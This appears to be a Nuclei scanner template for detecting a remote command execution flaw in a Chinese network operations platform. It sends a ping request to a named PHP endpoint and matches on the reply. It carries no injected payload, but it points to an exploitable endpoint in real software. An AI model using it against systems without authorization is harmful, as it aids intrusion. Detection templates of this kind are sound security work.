id: tg-net-rce

info:
  name: 万网博通全息AI网络运维平台rce
  author: Str1am
  severity: high
  tags: rce

requests:
  - raw:
      - |
        POST /nmss/toolMenu/Ajax/ajax_system_set.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cmd=ping_hostname&hostname=127.0.0.1&packet_size=56&count=4&haveEn=1

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "PING"
        part: body
        condition: and